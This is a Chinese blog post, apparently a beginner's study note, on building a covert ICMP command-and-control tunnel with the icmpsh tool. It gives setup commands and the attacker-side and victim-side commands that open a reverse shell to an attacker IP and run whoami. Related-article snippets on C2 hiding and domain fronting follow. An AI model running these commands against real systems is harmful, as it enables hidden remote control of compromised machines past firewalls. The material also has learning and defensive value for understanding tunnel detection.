隐藏c2隧道---ICMP之icmpsh的使用
纯纯菜鸟的学习记录,如有错误还请纠正
先来了解一下ICMP协议吧
ICMP用来传递差错,控制,查询等信息,在网络层,由于IP协议不可靠,就有了ICMP协议,由于网络探测,路由追踪与回馈
ICMP报文类型:
不可达类型的代码字段常用取值:
超时报文代码字段常用取值:
报文格式:
参考于https://blog.csdn.net/qq_21231413/article/details/88171590?ops_request_misc=%257B%2522request%255Fid%2522%253A%2522164464850716780265452295%2522%252C%2522scm%2522%253A%252220140713.130102334.pc%255Fall.%2522%257D&request_id=164464850716780265452295&biz_id=0&utm_medium=distribute.pc_search_result.none-task-blog-2allfirst_rank_ecpm_v1~rank_v31_ecpm-2-88171590.pc_search_result_cache&utm_term=icmp%E5%8D%8F%E8%AE%AE&spm=1018.2226.3001.4187
隐藏c2隧道之icmpsh
原理:进行隐蔽传输时,攻击端把要执行的命令隐藏在ICMP_ECHO数据包中,肉鸡接收数据包,解出命令并在防火墙内部主机上执行再把执行结果隐藏在ICMP_ECHOREPLY数据包中,发送给外部攻击端
利用关键点:数据部分
下图是ping,然后wireshark抓的ICMP包
ps:ICMP报文是由系统内核处理,不用占用任何端口 (一般通信要端口,比如你访问一个网站[80端口],本机会随机生成一个大于1023的端口去访问)
工具:icmpsh 处理畸形ping数据
受攻击必须是Windows,,,
1.下载:
git clone https://github.com/inquisb/icmpsh.git
2.关闭ping回复,防止内核自己对ping包回应,刷屏
sysctl -w net.ipv4.icmp_echo_ignore_all=1 #关闭ping回复,0开启
3.安装环境
git clone https://github.com/SecureAuthCorp/impacket.git #失败的话试试直接连接物理网络
cd impacket
sudo python setup.py install
攻击端:
cd icmpsh
./icmpsh_m.py <attacker’ s-ip> 受攻击方 #命令
受攻击机方命令
icmpsh.exe -t <attacker’ s-ip>
执行whoami
ok我们来看看 ICMP数据包(数据包太多了,不停止抓包,数据包一直有,wireshark太强了) data部分就是whoami
学习于漏洞银行
隐藏c2隧道---ICMP之icmpsh的使用相关推荐
- ipv6 访问内网_【内网渗透】—— 隐藏通信隧道技术之网络层隧道技术
hidden:是否完全隐藏控制面板,还有很多设置参数,比如也可以设置显示面板,然后设置宽高WIDTH="整数" 和 HIGH="整数". 1. 隐藏通信隧道基础 ...
- 第三章 隐藏通信隧道技术
第三章 隐藏通信隧道技术 3.1 隐藏通信隧道基础知识 3.1.1 隐藏通信隧道概述 什么是隧道? 在实际的网络中,通常会通过各种边界设备.软/硬件防火墙甚至入侵检测系统来检查对外连接情况,如果发现异 ...
- 内网渗透之隐藏通信隧道
前言 在实际的网络中,通常会通过各种边界设备.软/硬件防火墙甚至入侵检测系统来检查对外连接情况,如果发现异样,就会对通信进行阻断. 那么什么是隧道呢?隧道就是一种绕过端口屏蔽的通信方式.防火墙两端的数 ...
- DAY43(DAY44拓展):隐藏通信隧道技术的概述与使用
DAY43(DAY44拓展):隐藏通信隧道技术的概述与使用 OSI 七层模型 物链网传会表应 常用的隧道技术: (1)网络层:IPv6隧道.ICMP隧道.GRE隧道 (2)传输层:TCP隧道.UDP隧 ...
- 内网渗透测试:隐藏通讯隧道技术(上)
什么是隧道? 在实际的网络中,通常会通过各种边界设备.软/硬件防火墙甚至入侵检测系统来检查对外连接情况,如果发现异样,就会对通信进行阻断.那么什么是隧道呢?这里的隧道,就是一种绕过端口屏蔽的通信方式. ...
- 内网安全 隐藏通信隧道技术——应用层.(遨游于 内网任何主机)
隐藏通信隧道技术. 隐藏通信隧道就是一种 绕过端口屏蔽的通信方式.防火墙两端的数据包通过防火墙所允许的数据包类型或者端口进行封装,然后穿过防火墙,与对方进行通信.当被封装的数据包到达目的地时,将数据包 ...
- 内网安全 隐藏通信隧道技术——传输层.(遨游于 内网任何主机)
隐藏通信隧道技术. 隐藏通信隧道就是一种 绕过端口屏蔽的通信方式.防火墙两端的数据包通过防火墙所允许的数据包类型或者端口进行封装,然后穿过防火墙,与对方进行通信.当被封装的数据包到达目的地时,将数据包 ...
- 隐藏你的C2(使用域前置技术隐藏C2服务器,以及使用iptables策略来保护服务器)
文章目录 隐藏C2 CDN域前置 CDN 访问流程 配置CDN 效果 隐藏C2 配置CS Profile 上线CS 总结 iptables保护C2 流量转发 修改默认端口 推荐阅读 之前有一篇文章写过 ...
- 【红队APT】反朔源隐藏C2项目CDN域前置云函数数据中转DNS转发
文章目录 域前置-CDN隐藏C2真实IP 防止被溯源 什么是域前置 条件 原理 ==完整复现== 域前置溯源 DNS协议-域名记录解析 云函数-腾讯云操作 云函数如何溯源 端口转发-Iptables ...
最新文章
- 周末,我打开《逆水寒》参加了一场AI学术会议
- isInfoEnabled究竟多有用?
- 《复杂》读书笔记(part7)--遗传算法
- 处理字符集中的算式问题
- struts过滤器和拦截器的区别
- 等保测评报告_昆仑健康保2.0要停售了,还值得买这款产品吗?有哪些优缺点?...
- Linux 命令(52)—— ipcrm 命令
- python库发布之从零到一:发布自己的第一个库——blogdownloader
- 轻松筹 html模板,水滴筹、轻松筹感人标题模板25个字怎么写?在朋友圈发求捐款语录怎么写?...
- java date类赋值日期_Java中Date时间类
- HITB CTF 2018 gundam 做题笔记
- 14讲项目实战内页抽出切换效果的实现
- 找到服务器系统日志,查看服务器系统日志
- 百度经验-怎么进入系统故障恢复控制台
- Ubuntu学习笔记6-ESP32接收并处理cmd_vel话题
- unity3D 音频播放
- 利用网络编程实现TFTP协议
- Linux如何安装rpm文件
- 健身气功----八段锦
- Robot Framework 数据库连接和使用
热门文章
- 非监督分类器——聚类
- ubuntu 监视显卡使用情况
- androidstudio图片居中_android 在代码中设置布局居中layout_gravity,layout_margin的方法...
- 华为5G商用全球首例 深圳地铁车地超宽带通讯
- 对中文汉字进行排序的sql
- Spring Cloud Alibaba入门教程-05【Alibaba微服务组件Nacos配置中心】
- Ghost双系统安装工具 v1.0 绿色版
- matlab调幅举例,基于MATLAB的单边带调幅和解调的实现设计.doc
- oracle系统架构
- 信号与系统难点之采样正弦信号的获取问题